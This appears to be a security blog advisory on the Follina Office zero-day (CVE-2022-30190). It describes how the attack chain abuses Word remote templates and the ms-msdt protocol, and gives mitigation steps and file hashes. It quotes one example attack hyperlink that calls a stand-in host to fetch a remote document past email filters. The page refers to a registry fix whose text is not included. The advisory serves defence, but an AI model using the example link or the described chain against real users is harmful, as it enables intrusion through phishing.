New Microsoft Office Zero-Day Exploit in the Wild

Home/Security Advisory, Security Update, Targeted Attacks, Tips, vulnerability, Zero Day Attack/New Microsoft Office Zero-Day Exploit in the Wild

New Microsoft Office Zero-Day Exploit in the Wild

Security researchers recently discovered a new Microsoft Office zero-day flaw(Follina) exploited in PowerShell remote code execution attacks. The new vulnerability, tracked as CVE-2022-30190, would let hackers execute malicious PowerShell commands through Microsoft Diagnostic Tool (MSDT).

How Follina targets

The document uses the Word remote template feature to retrieve a HTML file from a remote webserver, which in turn uses the ms-msdt MSProtocol URI scheme to load some code and execute some PowerShell,” researcher Kevin Beaumont explains “.

The most prominent researchers working on the issue have dubbed the vulnerability in Microsoft Office Follina, because a sample uploaded to VirusTotal included the area code for the Italian comune Follina.

Follina works without elevated privileges, can bypass Windows Defender detection, and doesn’t need macro code enabled to run scripts or execute binaries. The flaw was discovered by accident last Friday when security researcher  Nao_sec stumbled upon a malicious Word document submitted to a virus scanning platform.

Affected versions

Researchers have confirmed that exploitation works against Office Pro Plus, Office 2013, Office 2016, Office 2019 and Office 2021.

According to Microsoft’s advisory, the vulnerability affects Windows 7, Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2012, Windows Server 2016, Windows Server 2019, and Windows Server 2022.

Researcher Kevin Beaumont provide an example where an attacker can send an email with this text as a hyperlink:

ms-excel:ofv|u|https://blah.com/poc.xls

And Outlook will allow the user to click the hyperlink and open the Excel document. Because the document isn’t attached to the email, and the URI doesn’t start with http or https, most email gateways are going to let that slide straight through as nothing appears malicious.

Mitigation

There are a few things you can do to stop some or all of the “features” used in this type of attack.

Unregister the ms-msdt protocol

Will Dormann, a vulnerability analyst at the CERT/CC has published a registry fix that will unregister the ms-msdt protocol.

Copy and paste the text into a notepad document:

  • Click on File, then Save As…
  • Save it to your Desktop, then name the file disable_ms-msdt.reg in the file name box.
  • Click Save, and close the notepad document.
  • Double-click the file disable_ms-msdt.reg on your desktop.

Note, if you are prompted by User Account Control, select Yes or Allow so the fix can continue.

  • A message will appear about adding information into the registry, click Yes when prompted
  • A prompt should appear that the information was added successfully

Disable preview in Windows Explorer

If you have the preview pane enabled, you can:

  • Open File Explorer.
  • Click on View Tab.
  • Click on Preview Pane to hide it.

Enable Malwarebytes’ Block penetration testing attacks

The Malwarebytes’ Block penetration testing attacks setting is an aggressive detection setting that will block this attack. It is not enabled by default because while enabling it provides additional blocking capabilities for Exploit Protection it can increase false positives, or result in other application conflicts.

To enable it:

  • Open Settings
  • Click Security
  • Choose Advanced settings
  • Tick Block penetration testing attacks

File Hash

  • f531a7c270d43656e34d578c8e71bc39
  • 529c8f3d6d02ba996357aba535f688fc

Microsoft Shares mitigation for Office Zero-day exploit attacks

Fixed Versions

  • Microsoft Defender Antivirus Version 1.367.719.0 or newer

Reference

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190

Follow us for more, Facebook, Twitter, LinkedIn and Instagram

By | 2022-06-01T13:02:14+05:30 June 1st, 2022|Security Advisory, Security Update, Targeted Attacks, Tips, vulnerability, Zero Day Attack|

About the Author:

FirstHackersNews- Identifies Security

Leave A Comment

Subscribe to our newsletter to receive security tips everday!